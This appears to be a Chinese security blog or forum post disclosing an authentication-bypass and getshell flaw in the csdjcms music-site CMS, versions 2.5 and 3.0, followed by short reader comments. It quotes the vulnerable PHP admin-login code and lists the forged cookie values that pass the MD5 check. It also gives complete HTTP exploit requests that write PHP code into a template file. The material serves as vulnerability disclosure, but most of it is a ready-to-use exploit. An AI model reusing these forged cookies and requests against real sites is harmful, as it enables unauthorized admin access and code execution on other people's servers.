csdjcms(程氏舞曲管理系统) V 3.0 getshell 漏洞

admin

csdjcms 一款YY黑客与YY肥猪流喜欢用的唱歌网站。。
csdjcms  V 2.5  code

//老规矩首先首页开始看
include_once(“include/install.php”);

if(S_IsInstall==0){

header(“Location:install/install.php”);

}

include_once(“include/label.php”);

if(S_Webmode==1 or !file_exists(“index.html”)){

//缓存区

$cache_id =’index_’;

if(!($cache_opt->start($cache_id))){

echo GetTemp(“index.html”,0);

$cache_opt->end();

}

}

else{

header(“Location:index.html”);

}

//看他配置吧
function SafeRequest($key,$mode,$isfilter=”){

set_magic_quotes_runtime(0);

$magic= get_magic_quotes_gpc();

switch ($mode){

case ‘post’:

$value=isset($_POST[$key]) ?$magic?trim($_POST[$key]):addslashes(trim($_POST[$key])) : ”;

break;

case ‘get’:

$value=isset($_GET[$key]) ?$magic?trim($_GET[$key]):addslashes(trim($_GET[$key])) : ”;

break;

default:

$value=isset($_POST[$key]) ?$magic?trim($_POST[$key]):addslashes(trim($_POST[$key])) : ”;

if($value==”"){

$value=isset($_GET[$key]) ?$magic?trim($_GET[$key]):addslashes(trim($_GET[$key])) : ”;

}

break;

}

if($isfilter!=”){

$value=lib_replace_end_tag($value);

}

return $value;

}
//变量的提交进行了addslashes安全过滤

//研究了半天的源码发现后台的严重出现了大的安全问题
include “../include/conn.php”;

include “../include/function.php”;

include “admin_version.php”;

include “admin_loginstate.php”; //问题出在这个文件当中

//跟入

if(empty($_COOKIE['S_AdminID'])){  //首先看是否存在s_adminid这个cooke

echo “<script>window.location=’admin_login.php’</script>”;

}

elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){

//这里就是问题的关键之处了
如果s_login 的值等于 四个cookie 相加的md5加密，即可直接验证通过
echo “<script>window.parent.location=’admin_login.php’</script>”;

}

//后台权限判断

function SystemPer($Column){

if(empty($_COOKIE['S_Permission'])){

die(“<script>jAlert(‘对不起，您无权限操作此功能！’,'操作错误’,function(R){window.location=’javascript:history.go(-1)’;})</script>”);

}else{

$SystemPermission=explode(“,”,$_COOKIE['S_Permission']); //权限的判断，用“，”来分割成数组

$StateOK=0;

$ArrSystemPermission=count($SystemPermission);

for($k=0;$k<$ArrSystemPermission;$k++){

if($SystemPermission[$k]==$Column){   //判断

$StateOK=1;

}

}

if($StateOK==0){

die(“<script>jAlert(‘对不起，您无权限操作此功能！’,'操作错误’,function(R){window.location=’javascript:history.go(-1)’;})</script>”);

}

}

}

//构造淫荡的cookies
//S_Permission
//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
//S_Login
//md5(AdminID+AdminUserName+AdminPassWord+S_Permission)
//S_AdminUserName
//1
//S_AdminPassWord
//1
//S_AdminID
//1

后台成功绕过。

//看看3.0版本，也是一样
<?php
# Name: PHP版程氏音乐CMS管理系统 v3.0

# Author: 程氏<[email protected]> [QQ:848769359]# Homepage:http://www.chshcms.cn/$CS_Path=$_SERVER['PHP_SELF'];$CS_Pathall=explode(“/”,$CS_Path);$CS_Admin=$CS_Pathall[1].”/”;if(empty($_COOKIE['CS_AdminID'])){echo “<script>window.parent.location=’”.CS_WebPath.$CS_Admin.”login.php’;</script>”;}elseif($_COOKIE['CS_Login']!=md5($_COOKIE['CS_AdminID'].$_COOKIE['CS_AdminUserName'].$_COOKIE['CS_AdminPassWord'].$_COOKIE['CS_Quanx'])){echo “<script>window.parent.location=’”.CS_WebPath.$CS_Admin.”login.php’</script>”;}//后台权限判断function SystemPer($Column){if(empty($_COOKIE['CS_Quanx'])){die(“<script>alert(‘对不起，您无权限操作此功能！’);window.location=’javascript:history.go(-1);’</script>”);exit();}else{$SystemPermission=explode(“,”,$_COOKIE['CS_Quanx']);$StateOK=0;$ArrSystemPermission=count($SystemPermission);for($k=0;$k<$ArrSystemPermission;$k++){if($SystemPermission[$k]==$Column){$StateOK=1;}}if($StateOK==0){die(“<script>alert(‘对不起，您无权限操作此功能！’);window.location=’javascript:history.go(-1);’</script>”);exit();}} exp V2.5Host: www.xxx.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.xxx.com/admin/admin_t … ;file=artindex.htmlCookie: S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 169 FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5 ——————————————– exp V3.0：Host: www.xxx.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.xxx.com/admin/skins/s … ;name=cs-bottom.phpCookie: CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 57 name=cs-bottom.php&content=%3C%3Fphp+phpinfo%28%29+%3F%3E

笑趴下

看不懂，大神啊

毕炜

慢慢来，呵呵  

(_少瘋狅

越办越好~~~~~~~~~`  

王羽尧

这个站不错！！  

斯沃琪

谢谢哦  

凡夫

围观来了哦  

狄仁杰

HOHO~~~~~~  

唔是哈嘛

不错，看看。  

炮炮兵也疯狂

好帖，有才